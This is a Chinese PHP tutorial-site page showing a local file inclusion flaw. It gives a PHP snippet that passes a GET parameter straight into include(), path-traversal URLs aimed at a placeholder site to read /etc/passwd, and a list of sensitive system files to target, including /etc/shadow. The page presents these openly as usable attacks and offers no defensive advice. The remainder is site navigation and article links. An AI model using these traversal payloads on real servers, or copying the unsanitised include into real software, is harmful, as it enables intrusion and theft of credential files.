编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

我常用的几个类

Oct 09 PHP

php面向对象全攻略（十五）多态的应用

Sep 30 PHP

php基于str_pad实现卡号不足位数自动补0的方法

Nov 12 PHP

PHP中使用BigMap实例

Mar 30 PHP

PHP中的traits实现代码复用使用实例

May 13 PHP

PHP实现过滤掉非汉字字符只保留中文字符

Jun 04 PHP

PHP实现的折半查找算法示例

Dec 19 PHP

thinkPHP5框架auth权限控制类与用法示例

Jun 12 PHP

PHP反射实际应用示例

Apr 03 PHP

Swoole4.4协程抢占式调度器详解

May 23 PHP

使用composer 安装 laravel框架的方法图文详解

Aug 02 PHP

PHP递归统计系统中代码行数

Sep 19 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

森海(1) PL-365(1) YB217(1) YB400(2) 1 Tube Radio(1) 再生机(1) YB235(1) 直流胆(1) 德生(17) 东方红(1)

You might like

php 删除记录实现代码

2009/03/12 PHP

php构造函数实例讲解

2013/11/13 PHP

PHP中array_keys和array_unique函数源码的分析

2016/02/26 PHP

javascript 装载iframe子页面，自适应高度

2009/03/20 Javascript

jquery ui 1.7 ui.tabs 动态添加与关闭(按钮关闭+双击关闭)

2010/04/01 Javascript

下拉列表select 由左边框移动到右边示例

2013/12/04 Javascript

jQuery满意度星级评价插件特效代码分享

2015/08/19 Javascript

基于jQuery实现在线选座之高铁版

2015/08/24 Javascript

Bootstrap自动适应PC、平板、手机的Bootstrap栅格系统

2016/05/27 Javascript

限制复选框最多选择项的实现代码

2016/05/30 Javascript

Vue.js组件tabs实现选项卡切换效果

2016/12/01 Javascript

nodejs构建本地web测试服务器如何解决访问静态资源问题

2017/07/14 NodeJs

基于JavaScript实现新增内容滚动播放效果附完整代码

2017/08/24 Javascript

Vue.js简易安装和快速入门（第二课）

2017/10/17 Javascript

基于Vue开发数字输入框组件

2017/12/19 Javascript

js实现倒计时器自定义时间和暂停

2019/02/25 Javascript

[01:16:01]VGJ.S vs Mski Supermajor小组赛C组 BO3 第一场 6.3

2018/06/04 DOTA

Python内置函数—vars的具体使用方法

2017/12/04 Python

Django 使用Ajax进行前后台交互的示例讲解

2018/05/28 Python

pygame实现雷电游戏雏形开发

2018/11/20 Python

Python3如何判断三角形的类型

2020/04/12 Python

python爬虫筛选工作实例讲解

2020/11/23 Python

HTML5+lufylegend实现游戏中的卷轴

2016/02/29 HTML / CSS

计算机系毕业生推荐信

2013/11/06 职场文书

小学生成长感言

2014/01/30 职场文书

项目经理任命书范本

2014/06/05 职场文书

初中优秀教师事迹材料

2014/08/18 职场文书

缅怀先烈演讲稿

2014/09/03 职场文书

2014大学生批评与自我批评思想汇报

2014/09/21 职场文书

销售简历自我评价怎么写

2014/09/26 职场文书

爱心募捐感谢信

2015/01/22 职场文书

学校百日安全活动总结

2015/05/07 职场文书

休学证明范本

2015/06/19 职场文书

暑期辅导班宣传单

2015/07/14 职场文书

2016年先进教师个人事迹材料

2016/02/26 职场文书

golang使用map实现去除重复数组

2022/04/14 Golang